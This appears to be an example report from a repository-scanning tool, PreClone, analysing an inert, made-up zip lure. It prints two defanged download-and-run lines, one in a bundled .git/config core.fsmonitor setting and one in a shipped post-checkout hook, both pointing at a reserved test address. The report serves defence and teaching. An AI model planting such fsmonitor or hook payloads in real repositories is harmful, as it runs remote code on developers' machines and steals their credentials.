Skip to content
PreClone

Example report: an inert, made-up repo

Zip lure with a live git hook and a booby-trapped .git/config

The lure: A “prospective client” emails a zip of their codebase: “unzip, check out the dev branch, tell us what's broken”.

Modelled on Proofpoint: UNK_DeadDrop repo-sharing lures, git docs: core.fsmonitor runs on git status. Addresses use reserved test ranges, so nothing here can reach anything.

brightpath-handoff.zip

Source
Inert example, modelled on a documented campaign
Files
6

Malware signs

Don't open this in your editor.

2 critical findings match patterns used by malware hidden in repos, set to run when you open the folder and when you commit or switch branches. Fake take-home tests and “review our code” lures are built this way.

  • Don't open it in VS Code, Cursor or any other editor or IDE. Don't commit, check out branches or pull in it.
  • If you already did: from another device, change the passwords saved in your browser, revoke GitHub, npm and cloud tokens, and move any crypto to a new wallet.
  • If someone sent it to you, check who they are before you reply, and don't run anything else they send.

When you open the folder

VS Code, Cursor, JetBrains, rust-analyzer, dev containers, Vim, Emacs, direnv, mise

CriticalRuns without asking

Git runs a command from the bundled .git/config on every git status (core.fsmonitor)

A repository you clone can't bring its own .git/config, but this archive does. Git runs sh -c 'curl -s hxxp://192[.]0[.]2[.]44/u | sh' # on every git status, which editors, shell prompts and coding agents run as soon as they open the folder. It downloads a script and pipes it to a shell.

Runssh -c 'curl -s hxxp://192[.]0[.]2[.]44/u | sh' #

.git/configline 5
  filemode = true  bare = false  fsmonitor = "sh -c 'curl -s hxxp://192[.]0[.]2[.]44/u | sh' #"[remote "origin"]  url = hxxps://github[.]com/brightpath-app/web.invalid.git
git.config.exec

When you commit or switch branches

Git hooks: husky, lefthook, pre-commit, post-checkout

Critical

The archive includes an active git hook: post-checkout

Clones never contain .git/hooks, but archives can. Git runs post-checkout as soon as you check out or switch a branch. Shipping a live hook inside a zip is a known way to get code running from a “just look at our repo” message. It downloads a script and pipes it to a shell.

.git/hooks/post-checkoutline 1
#!/bin/sh# PreClone demo fixture — inert reconstruction. Addresses are reserved test ranges; this file is shown, never run.nohup sh -c 'curl -s hxxp://192[.]0[.]2[.]44/p | sh' >/dev/null 2>&1 &
git.hooks.shipped

Everything that runs

Every entry point PreClone found, including the ordinary ones, so you can see the whole picture and not just the alarms.

  • Opengit status (editor git panel, shell prompt, agent)
    sh -c 'curl -s hxxp://192[.]0[.]2[.]44/u | sh' #.git/config:5core.fsmonitor
    AutomaticFlagged
  • Commitgit checkout
    nohup sh -c 'curl -s hxxp://192[.]0[.]2[.]44/p | sh' >/dev/null 2>&1 &.git/hooks/post-checkout
    Flagged
2 routine entries, nothing flagged in them
  • Runnpm run dev
    vitepackage.json:3
    Expected
  • Runnpm run build
    vite buildpackage.json:3
    Expected

Dependencies

3 direct dependencies. Checked against npm (packages it removed as malware, install scripts, downloads) and OSV malware advisories on Oct 11, 2026, when this example was captured. None matched a malware advisory or looked like a typo of a popular package.

Show the list
  • react^19.1.0
  • react-dom^19.1.0
  • vite^6.3.5dev

What this report can't tell you

  • PreClone reads files; it never runs them. Code that is downloaded later from somewhere else, compiled binaries and encrypted payloads can hide from a static read.

Engine 1.4.2. 5 of the 6 files read as text.